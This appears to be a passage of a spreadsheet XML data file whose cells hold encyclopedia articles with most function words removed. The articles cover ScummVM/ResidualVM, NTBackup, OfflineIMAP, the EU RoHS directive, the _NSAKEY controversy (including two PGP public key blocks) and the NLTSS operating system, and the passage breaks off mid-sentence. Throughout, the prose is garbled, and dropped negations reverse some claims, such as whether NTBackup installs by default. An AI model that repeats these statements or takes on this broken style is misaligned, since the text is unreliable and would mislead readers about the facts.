residualvm release myst iii: exile digital platforms.the digital storefront gog.com specialized selling digital copies older games, sells myst iii: exile residualvm engine part distribution. residualvm supported games stable release supports grim fandango myst iii: exile, completable minor glitches. development branch, also support escape monkey island, completable glitches, longest journey, completable missing features.like scummvm, residualvm contains fixes bugs present original executable. residualvm team discovered workaround causes critical dialog play grim fandango. addition, grim fandango engine residualvm fixes dozen bugs present original. there also branch residualvm called grim mouse, allows grim fandango played completely mouse traditional point click adventure game. supported games following games support built current release scummvm. lucasarts games order games' original release dates: sierra on-line games coktel vision games adventuresoft-horrorsoft games humongous entertainment games various games humongous entertainment scumm engine, therefore playable scummvm. games developers scummvm also supports following non-scumm games: games development following games available unstable daily builds, planned official support upcoming version. 11th hour chewy: clandestiny escape monkey island hades challenge obsidian sanitarium spider-man: sinister tender loving care uncle henry's playhouse wetlands notes also game engine recreation z-machine category:scummvm-supported games references external links official website "scummvm midi music enhancement project". jameswoodcock.co.uk.</t>
  </si>
  <si>
    <t>NTBackup</t>
  </si>
  <si>
    <t>ntbackup windows backup) built-in backup application introduced windows 3.51 included windows 4.0, windows 2000, windows windows server 2003. ntbackup comprises command-line utility wizard interfaces provide multiple options create, customize, manage backups, integrated shadow copy task scheduler. ntbackup creates backups proprietary file format external sources including floppy disks, hard drives, tape drives, drives. ntbackup replaced backup restore wbadmin starting windows vista, provide similar functionality instead virtual hard disk file format backup content; however, windows vista, possible restore ntbackup copying necessary files windows windows server backup replaces ntbackup beginning windows server 2008; neither backup restore windows server backup support tape drives.for reading/restoring older backups, microsoft made available ntbackup restore utility windows vista/windows server 2008 windows 7/windows server 2008 read files. when used tape drives, ntbackup uses microsoft tape format (mtf), also used backupassist backup exec veeam backup replication compatible bkf. features ntbackup supports several operating system features including backing computer's system state. computers domain controllers, includes windows registry, boot files, files protected windows file protection, performance counter configuration information, com+ class registration database, metabase, replicated data sets, exchange server data, cluster service information, certificate services database. domain controllers, ntbackup back active directory, including sysvol directory share. ntbackup supports encrypting file system, ntfs hard links junction points, alternate data streams, disk quota information, mounted drive remote storage information. saves ntfs permissions, audit entries ownership settings, respects archive attribute files folders create normal, copy, differential, incremental daily backups, backup catalogs, well automated system recovery. supports logging excluding files backup per-user users. hardware compression supported tape drive supports software compression supported, even backup files. ntbackup removable media devices supported natively removable storage manager (rsm) component windows. however, supports tape devices rsm-aware drivers.ntbackup windows newer includes volume shadow copy (vss) support thus back locked files. case windows home edition, ntbackup installed default available windows installation disc. windows introduced wizard-style user interface ntbackup addition advanced expert system administrator ntbackup scripting language create functional backup system. scripting enables system administrator automate schedule backups files system state, control follow media rotation strategy, reprogram work external well tape, send email reminders prompt users insert media compile backup reports include logs remaining capacity. alternative scripting software backupassist, automates ntbackup perform automatic, scheduled backups windows-based servers using ntbackup. third-party plug-ins used deprecated removable storage component microsoft windows support modern storage media external hard disks, flash memory, optical media blu-ray network file systems exposing pieces media virtual tape ntbackup based removable storage. ntbackup used windows vista copying ntbackup files windows machine. tapes backup locations removable storage manager, need turn turn windows features control panel, windows component removed. corrupt damaged backup files large size typical today's backups, faulty data transmission unreliable firewire interfaces, backup files prone corrupt damaged. when trying restore, ntbackup display messages like "the backup file unusable", "crc failed error" "unrecognized media". third-party, mostly commercial solutions recover corrupt files. references further reading john paul mueller (2007). windows administration command line windows vista, windows 2003, windows windows 2000. john wiley sons. isbn 978-0470165799. external links microsoft backup basics microsoft ntbackup guide windows professional mskb104169: files automatically skipped ntbackup microsoft tape format (mtf) specification document seagate mftar: filter convert mft/bkf files common format (linux unices)</t>
  </si>
  <si>
    <t>OfflineIMAP</t>
  </si>
  <si>
    <t>offlineimap imap synchronization utility software, capable synchronizing mail imap server local maildir folder another server. description synchronization performed bidirectionally endpoints ("remote" "local" repositories).offlineimap accesses mail servers internet message access protocol (post office protocol another popular mail server supported), works faster (though sensitive connection's latency) supports advanced features mail clients. special mode better handling non-standard implementation imap gmail optionally enabled configuration file.when configured store mail locally, offlineimap uses maildir format. unix mail boxes support added future, though currently implemented. configuration several synchronizations account, consisting remote local repositories, defined configuration file. each repository configured separately, allowing specify credentials access method. filtering translation offlineimap capable filtering folders remote repository, partial synchronization would occur needed. capability define mask would matched list folders synchronization. this achieved using python's lambda capability; example, synchronize "inbox", "sent mail" "received" folders specify following rule: remaining folders' names altered (translated) using similar construct: this technique also used synchronize content imap server folder another server. limitations each account separate directory; otherwise synchronization process suffer unexpected behavior even data loss. user interface offlineimap provides several command-line interfaces, including interactive color curses-based, non-interactive console logging, several less verbose modes. tk-based graphical user interface also available. also mail delivery agent references</t>
  </si>
  <si>
    <t>Restriction of Hazardous Substances Directive</t>
  </si>
  <si>
    <t>restriction hazardous substances directive 2002/95/ec (rohs short directive restriction certain hazardous substances electrical electronic equipment, adopted february 2003 european union.the rohs directive took effect july 2006, required enforced became member state. this directive restricts (with exceptions) hazardous materials manufacture various types electronic electrical equipment. addition exceptions, exclusions products solar panels. closely linked waste electrical electronic equipment directive (weee) 2002/96/ec (now superseded) sets collection, recycling recovery targets electrical goods part legislative initiative solve problem huge amounts toxic electronic waste. speech, rohs often spelled out, pronounced refers standard, unless otherwise qualified. details each european union member state adopt enforcement implementation policies using directive guide. rohs often referred "lead-free directive," restricts following substances: lead (pb) mercury (hg) cadmium (cd) hexavalent chromium (cr6+) polybrominated biphenyls (pbb) polybrominated diphenyl ether (pbde) bis(2-ethylhexyl) phthalate (dehp) butyl benzyl phthalate (bbp) dibutyl phthalate (dbp) diisobutyl phthalate (dibp)maximum permitted concentration: 0.1%max cadmium: 0.01%dehp, bbp, dibp added part directive (eu) 2015/863 published march 2015.pbb pbde flame retardants used several plastics. hexavalent chromium used chrome plating, chromate coatings primers, chromic acid. maximum permitted concentrations non-exempt products 0.1% 1000 (except cadmium, limited 0.01% ppm) weight. restrictions homogeneous material product, means limits apply weight finished product, even component, single material could (theoretically) separated mechanically example, sheath cable tinning component lead. example, radio composed case, screws, washers, circuit board, speakers, etc. screws, washers, case made homogenous materials, components comprise multiple sub-components many different types material. instance, circuit board composed bare printed circuit board (pcb), integrated circuits (ic), resistors, capacitors, switches, etc. switch composed case, lever, spring, contacts, pins, etc., made different materials. contact might composed copper strip surface coating. loudspeaker composed permanent magnet, copper wire, paper, etc. everything identified homogeneous material must meet limit. turns case made plastic 2,300 (0.23%) used flame retardant, entire radio would fail requirements directive. effort close rohs loopholes, 2006 european commission asked review currently excluded product categories (monitoring control equipment, medical devices) future inclusion products must fall rohs compliance. addition commission entertains requests deadline extensions exclusions substance categories, substance location weight. legislation published official journal july 2011 supersedes exemption. note batteries included within scope rohs. however, europe, batteries european commission's 1991 battery directive (91/157/eec), recently increased scope approved form battery directive, version 2003/0282 cod, official submitted published eu's official journal. while first battery directive addressed possible trade barrier issues brought disparate european member states' implementation, directive explicitly highlights improving protecting environment negative effects waste contained batteries. also contains programme ambitious recycling industrial, automotive, consumer batteries, gradually increasing rate manufacturer-provided collection sites 2016. also sets limits mercury cadmium batteries except used medical, emergency, portable power-tool devices. though setting quantitative limits quantities lead, lead–acid, nickel, nickel–cadmium batteries, cites need restrict substances provide recycling batteries substances. there also provisions marking batteries symbols regard metal content recycling collection information. directive applies equipment defined section weee directive. following numeric categories apply: large household appliances small household appliances telecommunications equipment (although infrastructure equipment exempt countries) consumer equipment lighting equipment including light bulbs electronic electrical tools toys, leisure, sports equipment medical devices (exemption removed july 2011) monitoring control instruments (exemption removed july 2011) automatic dispensers other covered categories above.it apply fixed industrial plant tools. compliance responsibility company puts product market, defined directive; components sub-assemblies responsible product compliance. course, given fact regulation applied homogeneous material level, data substance concentrations needs transferred supply chain final producer. standard recently developed published facilitate data exchange, ipc-1752. enabled forms free use. rohs applies products whether made within imported. certain exemptions apply, updated occasion examples product components containing restricted substances rohs restricted substances used broad array consumer electronics products. examples components contained lead include: paints pigments (vinyl) cables stabiliser (e.g., power cords, cables) solders printed circuit board finishes, leads, internal external interconnects glass television photographic products (e.g., television screens camera lenses) metal parts lamps bulbs batteries integrated circuits microchipscadmium found many components above; examples include plastic pigmentation, nickel–cadmium (nicd) batteries photocells (used night lights). mercury used lighting applications automotive switches; examples include fluorescent lamps mercury tilt switches (these rarely used nowadays). hexavalent chromium used metal finishes prevent corrosion. polybrominated biphenyls diphenyl ethers/oxides used primarily flame retardants. hazardous materials high-tech waste problem rohs efforts reduce hazardous materials electronics motivated part address global issue consumer electronics waste. newer technology arrives ever-increasing rate, consumers discarding obsolete products sooner ever. this waste ends landfills countries like china "recycled." fashion-conscious mobile market, million u.s. cell phones took last call 2005. told, estimates u.s. year, million tons computers, tvs, vcrs, monitors, cell phones, equipment discarded. sources electronic waste tallied, could total million tons year worldwide, according environment programme. american electronics sent offshore countries like ghana west africa guise recycling harm good. adult child workers jobs poisoned heavy metals, metals returning u.s. "the u.s. right shipping large quantities leaded materials china, china world's major manufacturing center," jeffrey weidenhamer says, chemistry professor ashland university ohio. "it's surprising things coming full circle we're getting contaminated products back." changing toxicity perceptions addition high-tech waste problem, rohs reflects contemporary research past years biological toxicology acknowledges long-term effects low-level chemical exposure populations. testing capable detecting much smaller concentrations environmental toxicants. researchers associating exposures neurological, developmental, reproductive changes. rohs environmental laws contrast historical contemporary seek address acute toxicology, direct exposure large amounts toxic substances causing severe injury death. life-cycle impact assessment lead-free solder united states environmental protection agency (epa) published life-cycle assessment (lca) environmental impacts lead-free tin–lead solder, used electronic products. solders, lead-free solders considered, tin/copper alternative lowest (best) scores. paste solders, bismuth/tin/silver lowest impact scores among lead-free alternatives every category except non-renewable resource consumption. paste solders, lead-free solder alternatives lower (better) score toxicity categories tin/lead solder. this primarily toxicity lead, amount lead leaches printed wiring board assemblies, determined leachability study conducted partnership. study results providing industry objective analysis life-cycle environmental effects leading candidate alternative lead-free solders, allowing industry consider environmental concerns along traditionally evaluated parameters cost performance. this assessment also allowing industry redirect efforts toward products processes reduce solders' environmental footprint, including energy consumption, releases toxic chemicals, potential risks human health environment. another life-cycle assessment ikp, university stuttgart, shows similar results study. life-cycle impact assessment bfr-free plastics concentrations brominated flame retardants (bfr) 0.1% plastics affected plastics recycling. products include recycled plastics, become critical know concentration plastics, either tracing origins recycled plastics establish concentrations, measuring concentrations samples. plastics high concentrations costly handle discard, whereas plastics levels 0.1% value recyclable materials. there number analytical techniques rapid measurement concentrations. x-ray fluorescence spectroscopy confirm presence bromine (br), indicate concentration specific molecule. attachment mass spectrometry (iams) used measure concentrations plastics. significantly affected upstream (plastic material selection) downstream (plastic material recycling). 2011/65/eu (rohs rohs directive (2011/65/eu) evolution original directive became july 2011 took effect january 2013. addresses substances original directive improving regulatory conditions legal clarity. requires periodic re-evaluations facilitate gradual broadening requirements cover additional electronic electrical equipment, cables spare parts. logo indicates compliance rohs declaration conformity detailed (see below).in 2012, final report european commission revealed member states considered toys scope primary rohs directive 2002/95/ec, irrespective whether primary secondary functions using electric currents electromagnetic fields. from implementation rohs rohs recast directive 2011/65/eu concerned member states comply regulation. difference recast necessary demonstrate conformity similar directives. able show compliance sufficiently detailed files, ensuring implemented production criminal offence. like marking directives mandates production control traceability technical files. describes methods achieving presumption conformity (directive 2011/65/eu article 16.2), either technical files include test data materials standard accepted official journal directive, used. currently standard 63000:2016 (iec 63000:2016 superseded 50581:2012), risk based method reduce amount test data required (harmonised standards list rohs2, ojeu c363/6). consequences requirement demonstrate conformity requirement know exemption component, otherwise possible know compliance product placed market, point time product must 'compliant'. many understand 'compliance' varies depending exemptions force quite possible make non-compliant product 'compliant' components. compliance must calculated placing market. reality means knowing exemption status components using stock status parts expire date exemptions (directive 2011/65/eu article referring decision 768/2008/ec module internal production control). system manage could seen lack diligence criminal prosecution could occur instrument 2012 3032 section penalties). rohs also dynamic approach exemptions, creating automatic expiration exemptions renewed requests industry. additionally substances added controlled list, substances expected controlled 2019. mean greater information control update systems required.other differences include responsibilities importers distributors markings improve traceability technical files. these part directives make supply chain active part policing (directive 2011/65/eu articles 10). there recent additional amendment 2017/2102 2011/65 2015/863 (rohs amendment) rohs directive (2011/65/eu) contains allowance materials materials highlighted attention original version, amendment 2015/863 adds four additional substances annex 2011/65/eu (3/4 restrictions recommended investigation original directive, para preamble). this another reason simple component rohs compliance statements acceptable compliance requirements vary depending date product placed market (ref 63000:2016). additional four substances restriction evidence requirements shall applied products placed market july 2019 except exemptions permit stated annex iii., although time writing exemptions exist applied for, materials. four additional substances bis(2-ethylhexyl) phthalate (dehp) benzyl butyl phthalate (bbp) dibutyl phthalate (dbp) diisobutyl phthalate (dibp)the maximum permitted concentrations non-exempt products 0.1%. substances also listed reach candidate list, dehp authorised manufacturing (use substance) annex reach. scope exclusions with recast original rohs directive (2002/95/ec), scope directive decoupled scope weee directive open scope introduced. rohs (ii) directive (2011/65/eu) applicable electrical electronic equipment. scope limitations exclusions specifically introduced article 2(4) recast directive. scope directive, unless specific exemptions granted commission delegated acts (see next paragraph). scope exclusions listed this directive apply equipment necessary protection essential interests security member states, including arms, munitions material intended specifically military purposes; equipment designed sent space; equipment specifically designed, installed, part another type equipment excluded fall within scope directive, fulfil function part equipment, replaced specifically designed equipment; large-scale stationary industrial tools; large-scale fixed installations; means transport persons goods, excluding electric two-wheel vehicles type-approved; non-road mobile machinery made available exclusively professional use; active implantable medical devices; photovoltaic panels intended used system designed, assembled installed professionals permanent defined location produce energy solar light public, commercial, industrial residential applications; equipment specifically designed solely purposes research development made available business-to-business basis. restriction exemptions there exemptions, quite broad. exemptions automatically expire years unless renewed.according hewlett packard: "the european union gradually narrowing scope expiring many current rohs exemptions. addition, likely substance restrictions introduced next several years."some exemptions: lead alloying element steel containing 0.35% lead weight, aluminium containing 0.4% lead weight, copper alloy containing lead weight permitted. (category lead high melting temperature type solders (i.e. lead-based solder alloys containing lead weight). (category "lead solders servers, storage storage array systems, network infrastructure equipment switching, transmission, network management telecommunications." (category limited amounts mercury fluorescent light bulbs essential functioning comprise rohs categories 4medical devices exempt original directive. rohs narrowed exemption's scope active implantable medical devices (category 4h). vitro diagnostic devices (ivdd) medical devices included.automotive vehicles exempt (category 4f). vehicles instead addressed life vehicles directive (directive 2000/53/ec). labeling documentation products within scope rohs directive must display mark, manufacturers name address serial batch number. parties needing know detailed compliance information find declaration conformity product created manufacturer (brand owner) responsible design representative. regulation also requires actors supply chain product (importer distributors) keep check document, well ensuring conformance process followed correct language translation instructions provided. manufacturer must keep certain documentation demonstrate conformity, known technical file technical records. directive requires manufacturer demonstrate conformity test data materials following harmonised standard (iec 63000:2016 standard time writing). regulators request file likely, specific data likely large. history rohs require specific product labelling, many manufacturers adopted compliance marks reduce confusion. visual indicators included explicit "rohs compliant" labels, green leaves, check marks, "pb-free" markings. chinese rohs labels, lower case within circle arrows, also imply compliance. rohs attempts address issue requiring aforementioned mark whose policed trading standards enforcement agency. states permitted indication rohs compliance mark. closely related weee (waste electrical electronic equipment directive), became simultaneously rohs, depicts waste-can logo often accompanies mark. future possible additions substance restrictions considered introduction next years include phthalates, brominated flame retardants (bfrs), chlorinated flame retardants (cfrs), pvc. other regions asia pacific china order final measures administration control electronic information products (often referred china rohs) stated intent establish similar restrictions, fact takes different approach. unlike rohs, products specified categories included unless specifically excluded, list included products, known catalogue article regulation subset total scope electronic information products, eips, regulations apply. initially, products fall covered scope must provide markings disclosure presence certain substances, substances (yet) prohibited. there products eips, scope rohs, e.g. radar systems, semiconductor-manufacturing equipment, photomasks, etc. list eips available chinese english. marking disclosure aspects regulation intended take effect july 2006, postponed twice march 2007. there timeline catalogue yet. japan japan direct legislation dealing rohs substances, recycling laws spurred japanese manufacturers move lead-free process accordance rohs guidelines. ministerial ordinance japanese industrial standard marking specific chemical substances (j-moss), effective july 2006, directs electronic products exceeding specified amount nominated toxic substances must carry warning label. south korea south korea promulgated resource recycling electrical electronic equipment vehicles april 2007. this regulation aspects rohs, weee, elv. united states consumer product safety enacted 1972 followed consumer product safety improvement 2008. california passed electronic waste recycling 2003 (ewra). this prohibits sale electronic devices january 2007, prohibited sold rohs directive, across much narrower scope includes lcds, crts, like covers four heavy metals restricted rohs. ewra also restricted material disclosure requirement. effective january 2010, california lighting efficiency toxics reduction applies rohs general purpose lights, i.e. "lamps, bulbs, tubes, electric devices provide functional illumination indoor residential, indoor commercial, outdoor use."other states cities debating whether adopt similar laws, several states mercury pbde bans already. ireland worldwide standards certification available 080000 standard, governed national standards authority ireland, ensure control hazardous substances industrial applications. sweden 2012 sweden's chemicals agency (kemi) electrical safety authority tested consumer electronics products found compliance. kemi claims similar testing results prior years. "eleven products contained prohibited levels lead, polybrominated diphenyl ether flame retardants. details seven companies passed swedish prosecutors. kemi says levels non-compliance rohs similar previous years, remain high." other standards rohs environmental standard electronic product developers aware. manufacturers find cheaper single bill materials product distributed worldwide, instead customising product country's specific environmental laws. therefore, develop standards, allow strictest allowable substances. example, forces suppliers complete product content declaration form document compliance environmental standard 'baseline environmental requirements materials, parts products logo hardware products'. thus, banned decabde, even though formerly rohs exemption material (overturned european court 2008).similarly, hewlett-packard's environmental standard. criticism adverse effects product quality reliability, plus high cost compliance (especially small business) cited criticisms directive, well early research indicating life cycle benefits lead-free solder versus traditional solder materials mixed.criticism earlier came industry resistant change misunderstanding solders soldering processes. deliberate misinformation espoused resist perceived "non-tariff barrier created european bureaucrats." many believe industry stronger experience better understanding science technologies involved.one criticism rohs restriction lead cadmium address prolific applications, costly electronics industry comply with. specifically, total lead used electronics makes world lead consumption, lead used batteries (covered battery directive, mentioned above, requires recycling limits mercury cadmium, restrict lead). another criticism less lead landfills electronic components circuit boards, approximately leaded glass cathode tube monitors televisions, contain screen.this study done right tech boom.the common lead-free solder systems higher melting point, e.g. typical difference tin-silver-copper alloys, wave soldering temperatures approximately ~255 however temperature typical lead-free solders longer wetting times eutectic pb/sn 37:63 solder. additionally wetting force typically lower, disadvantageous (for hole filling), advantageous situations (closely spaced components). care must taken selection rohs solders formulations harder less ductility, increasing likelihood cracks instead plastic deformation, typical lead-containing solders. cracks occur thermal mechanical forces acting components circuit board, former common manufacturing latter field. rohs solders exhibit advantages disadvantages respects, dependent packaging formulation.the editor conformity magazine wondered 2005 transition lead-free solder would affect long-term reliability electronic devices systems, especially applications mission-critical consumer products, citing possible breaches environmental factors like oxidation. 2005 farnell/newark inone "rohs legislation technical manual", cites "lead-free" solder issues, warping delamination printed circuit boards; damage through-holes, components circuit boards; and, added moisture sensitivity, compromise quality reliability. effect reliability potential reliability concerns addressed annex item rohs directive, granting specific exemptions regulation 2010. these issues raised directive first implemented 2003 reliability effects less known.another potential problem lead-free, high tin-based solders face growth whiskers. these thin strands grow make contact adjacent trace, developing short circuit. lead solder suppresses growth whiskers. historically whiskers associated handful failures, including nuclear power plant shutdown pacemaker incident pure plating used. however, failures pre-date rohs. they also involve consumer electronics, therefore employ rohs-restricted substances desired. manufacturers electronic equipment mission-critical aerospace applications followed policy caution therefore resisted adoption lead-free solders. help mitigate potential problems, lead-free manufacturers using variety approaches tin-zinc formulations produce non-conducting whiskers formulations reduce growth, although halt growth completely circumstances. fortunately, experience thus suggests deployed instances rohs compliant products failing whisker growth. ronald lasky dartmouth college reports: "rohs force months now, ~$400b rohs-compliant products produced. with products field, significant numbers whisker-related failures reported." whisker growth occurs slowly time, unpredictable, fully understood, time true test efforts. whisker growth even observable lead-based solders, albeit much smaller scale. some countries exempted medical telecommunication infrastructure products legislation. however, moot point, since electronic component manufacturers convert production lines producing lead-free parts, conventional parts eutectic tin-lead solder simply available, even military, aerospace industrial users. extent solder involved, least partially mitigated many lead-free components' compatibility lead-containing solder processes. leadframe-based components, quad flat packages (qfp), small outline integrated circuits (soic), small outline packages (sop) gull wing leads, generally compatible since finish part leads contributes small amount material finished joint. however, components ball grid arrays (bga) come lead-free solder balls leadless parts often compatible lead-containing processes. economic effect there minimis exemptions, e.g., micro-businesses. this economic effect anticipated least attempts mitigating effect made.another form economic effect cost product failures switch rohs compliance. example, whiskers responsible failure rate certain components swiss swatch watches 2006, prior july implementation rohs, reportedly triggering us$1 billion recall. swatch responded applying exemption rohs compliance, denied. benefits health benefits rohs helps reduce damage people environment third-world countries much today's "high-tech waste" ends lead-free solders components reduces risks electronics industry workers prototype manufacturing operations. contact solder paste longer represents health hazard used reliability concerns unfounded contrary predictions widespread component failure reduced reliability, rohs's first anniversary (july 2007) passed little fanfare. most contemporary consumer electronics rohs compliant. 2013, millions compliant products worldwide. many electronics companies keep "rohs status" pages corporate websites. example, website states: although lead containing solder cannot completely eliminated applications today, engineers developed effective technical solutions reduce lead content microprocessors chipsets ensure rohs compliance minimizing costs maintaining product features. there change fit, functional, electrical performance specifications. quality reliability standards rohs compliant products expected identical compared current packages. rohs printed circuit board finishing technologies surpassing traditional formulations fabrication thermal shock, solder paste printability, contact resistance, aluminium wire bonding performance nearing performance attributes.the properties lead-free solder, high temperature resilience, used prevent failures harsh field conditions. these conditions include operating temperatures test cycles range +150 severe vibration shock requirements. automobile manufacturers turning rohs solutions electronics move engine bay. flow properties assembly major differences lead-containing lead-free solder pastes "flow" solder liquid state. lead-containing solder lower surface tension, tends move slightly attach exposed metal surfaces touch part liquid solder. lead-free solder conversely tends stay place liquid state, attaches exposed metal surfaces liquid solder touches this lack "flow" typically seen disadvantage lead lower quality electrical connections used place components tightly used placed properties lead-containing solders. example, motorola reports rohs wireless device assembly techniques "...enabling smaller, thinner, lighter unit." their motorola phone would possible without solder. lead-free solder allows tighter spacing. some exempt products achieve compliance research alloys technologies allowing companies release rohs products currently exempt compliance, e.g. computer servers. announced rohs solution high lead solder joints thought remain permanent exemption. lead-free packaging technology "...offers economical advantages relation traditional bumping processes, solder waste reduction, bulk alloys, quicker time-to-market products much lower chemical usage rate."test measurement vendors, national instruments, also started produce rohs-compliant products, despite devices category exempt rohs directive. practical rohs compliance misleading rohs3 (eu) allows exemptions, lead content high-temperature soldering alloys.therefore good companies clearly define level compliance product main datasheets (ds); ideally, provide product content sheet (pcs) full substance declaration mass. similarly, good developers (and users) carefully validate product info make sure exact material safety expected. industry examples: rohs3 compliant without exemptions rohs3 compliant applicable exemptions rohs3 compliant exemption rohs3 compliant, lead-free rohs3 compliant, green (where term green company-specific standard, lead-free halogen-free) rohs3 compliant exemptions, lead-free finishideal: rohs3 compliant without exemptions good minimum standard: rohs3 compliant exemption lead-content internal-only material help prevent lead-exposure touch, lead-leakage water) also reach battery directive electronic waste green computing attachment mass spectrometry used enforce rohs limits banned substances lead safe work practices list european union directives waste electrical electronic equipment directive references further reading hwang, jennie (2004). introduction implementing lead-free electronics. mcgraw-hill professional. isbn 978-0-07-144374-6. external links rohs compliance guidance businesses netregs.gov.uk rohs compliance www.rohs.eu official united kingdom site rohs rohs enforcement guidance document, v.1; rohs enforcement authorities informal network; 2006 properties lead-free solders national institute standards technology support industry compliance directive restriction certain hazardous substances (rohs) nist.gov case study rohs2 compliance</t>
  </si>
  <si>
    <t>NSAKEY</t>
  </si>
  <si>
    <t>_nsakey variable name discovered windows 1999 andrew fernandes cryptonym corporation. variable contained 1024-bit public key; keys used public-key cryptography encryption authentication. because name, however, speculated would allow united states national security agency (nsa) subvert windows user's security. microsoft denied speculation said key's name came fact technical review authority u.s. cryptography export controls. overview microsoft requires cryptography suites interoperate microsoft windows digital signature. since microsoft-approved cryptography suites shipped windows, possible keep export copies operating system compliance export administration regulations (ear), enforced bureau industry security (bis). already known microsoft used keys, primary spare, either create valid signatures. upon releasing service pack windows microsoft neglected remove debugging symbols advapi32.dll, library used advanced windows features registry security. andrew fernandes, chief scientist cryptonym, found primary stored variable _key second labeled _nsakey. fernandes published discovery, touching flurry speculation conspiracy theories, including possibility second owned united states national security agency (the nsa) allowed intelligence agency subvert windows user's security.during presentation computers, freedom privacy 2000 (cfp2000) conference, duncan campbell, senior research fellow electronic privacy information center (epic), mentioned _nsakey controversy example outstanding issue related security surveillance.in addition, nicko someren found third windows 2000, doubted legitimate purpose, declared looks fishy". microsoft's reaction microsoft denied backdoor speculations _nsakey said "this speculation ironic since microsoft consistently opposed various escrow proposals suggested government." according microsoft, key's symbol "_nsakey" technical review authority u.s. cryptography export controls, ensured compliance u.s. export laws.richard purcell, microsoft's director corporate privacy, approached campbell presentation expressed wish clear confusion doubts _nsakey. immediately conference, scott culp, microsoft security response center, contacted campbell offered answer questions. their correspondence began cordially soon became strained; campbell apparently felt culp evasive culp apparently felt campbell hostilely repeating questions already answered. april 2000, culp stated definitely reached discussion [which] rapidly spiraling realm conspiracy theory".microsoft claimed third beta builds windows 2000 purpose signing cryptographic service providers.the mozilla page common questions cryptography mentions: fact possible certain circumstances obtain export license software invoking cryptographic functions api. example, microsoft's implementation microsoft cryptographic (cryptoapi) specification approved export even though implements third parties, including third parties outside separate modules ("cryptographic service providers" csps) implementing cryptographic functionality. this export approval presumably made possible cryptoapi implementation requires third party csps digitally signed microsoft rejects attempts call csps signed; signing process microsoft ensure compliance relevant export control regulations (e.g., presumably would sign developed outside implements strong cryptography); microsoft's cryptoapi implementation available executable form, thus presumed reasonably resistant user tampering disable digital signature check. microsoft stated second present backup guard possibility losing primary secret key. fernandes doubts explanation, pointing generally accepted guard loss secret secret splitting, would divide several different parts, would distributed throughout senior management. stated would robust using keys; second also lost, microsoft would need patch upgrade every copy windows world, well every cryptographic module ever signed. hand, microsoft failed think consequences loss created first without using secret splitting (and secure hardware allow protection weakened generation), pointed problem part review process, might explain microsoft weakened scheme second called _nsakey. (the second might backed using secret splitting, losing keys problem.) another possibility microsoft included second able sign cryptographic modules outside united states, still complying bis's ear. cryptographic modules signed multiple locations, using multiple keys reasonable approach. however, cryptographic module ever found signed _nsakey, microsoft denies certification authority exists. possible remove second _nsakey. there good news among bad, however. turns flaw "crypto_verify" function implemented. because crypto verification occurs, users easily eliminate replace operating system without modifying microsoft's original components. since easily replaced, means non-us companies free install "strong" crypto services windows, without microsoft's nsa's approval. thus effectively removed export control "strong" crypto windows. demonstration program replaces found cryptonym's website. keys september 1999, anonymous researcher reverse-engineered primary _nsakey pgp-compatible format published servers. primary (_key) type bits/keyid date user 1024/346b5095 1999/09/06 microsoft's capi &lt;postmaster@microsoft.com&gt; -----begin public block----- version: 2.6.3i mqcpazftc8yaaaeealjz4nepw3xhc7djplkws2li6xziatyjujg+asysevhz2mwy 2wlrggxffhtmsjo9fj3ieaofbskm01rns0kfoumvg/gmczsput1py9d7kaepjxeb f8c4d+r32p0c3v+fcovoxjdpsqz7rq+lj+hfuee8gikauxszu/segce0a1cvabeb aag0l01py3jvc29mdcdzienbuekga2v5idxwb3n0bwfzdgvyqg1py3jvc29mdc5j b20+iqevawuqn9nz5j57yqgoskvraqfr/gf8dgm1haxwbmx/0bl4m0metm+im39j yi5mub0ie1hrlexp7lvjezbtyrryv3tdv6u3oip+kzdthdxb0fmgu5z+wht34uzu xl6q7m7ob76skfnawgoszxqke5yqrxxgsn3ovzhv6ybalekwtsdvasmg8+ijnx+n nvmtyruz+mdrrfcefdhfntbli8nlqenlx6ccnnfokdr7zkypbvosxw/z6q7u9rej tsjbt0swybhx+3evt8n2nwxwb2ounmnm9h2gyfxhikhxrwtjk2ag/3j7k6evxs+m rp+crfob32sto1ib2sr7gy7czuwopdqrxo8kmqzyhazqz1x6myurxyw3tg== =ms8c -----end public block----- secondary (_nsakey _key2) type bits/keyid date user 1024/51682d1f 1999/09/06 nsa's microsoft capi &lt;postmaster@nsa.gov&gt; -----begin public block----- version: 2.6.3i mqcpazftdh0aaaeealqoff7jzrypthz5pitnhcyvrypwzzjk2b7cnaj9oqrqiqoi e1ydpah/oqh3hsq/butpnjuzdukpb/0izqmczxhow5f1q5rbfy0y1xy2bcbfsyij 4req7qhrmb8nvgz7ow/ykdcx2lognmdrgjsw6cmjk7rw0veqfoypgf1rac0fabeb aag0lu5tqsdzie1py3jvc29mdcbdqvbjigtlesa8cg9zdg1hc3rlckbuc2euz292 pokbfqmfedftdje+e8qokljfuqebhnsh/ihue7oq6dhu1djjvxwcyw6p1iw+0eur yfzjwpzpotq8m5rc7frjdubgqqjofdr++zn9kd9bjnpvux/zjcvsftnu/5x1qn1r it7ihu/6aem1h4bs6ke5mppjkrxrkqqjbw4f0cgxg6+lv+v9cnmylzhref3pzcqa 5doi5crq0iwyjqct9br07bl9c3x5whnnrsrir9wivfpk8eyxhnyl/nih2gzxybne uwjas2kujnvvozjxgymcnntwjltzk4rlzxo05fw2injbtefmc+m823vvltm9l/f+ n2iybaads6i/0v2acvkny19cjncc3wqzkaiiyqfpzl19kt8vdngi9ue= =phht -----end public block----- also lotus notes openly used order comply cryptography export regulations clipper chip references</t>
  </si>
  <si>
    <t>NLTSS</t>
  </si>
  <si>
    <t>network livermore timesharing system (nltss, also sometimes livermore time sharing system) operating system actively developed lawrence livermore laboratory (now lawrence livermore national laboratory) 1979 1988, though continued production applications 1995. earlier system, livermore time sharing system developed decade earlier. nltss initially 7600 computer, production 1985 1994 cray computers including cray-1, cray x-mp, cray y-mp models. characteristics nltss operating system unusual many respects unique some. low-level architecture nltss microkernel message passing system. unique system call supported kernel system. that system call, might called "communicate" name need distinguished system calls) accepted list "buffer tables" (e.g., nltss message system interface) contained control information message communication either sends receives. such communication, locally within system across network kernel system supported directly user processes. "message system" (supporting call network protocols) drivers disks processor composed entire kernel system. mid-level architecture nltss capability-based security client–server system. primary servers file server process server. file server process privileged trusted drivers local storage (disk storage,) process server process privileged trusted processor driver (software switched time sharing control processes "alternator", handled interrupts processes besides "communicate" call, provided access memory process state process server, etc.). nltss true network operating system resource requests could come local processes remote processes anywhere network servers distinguish them. server's means make distinctions would network address reason make distinctions. requests servers appeared network requests. communication processes nltss convention used livermore interactive network communication system (lincs) protocol suite, defined protocol stack along lines defined reference model. transport level protocol nltss lincs named delta-t. presentation level, lincs defined standards communicating numbered parameters tokens (e.g., integers, capabilities, 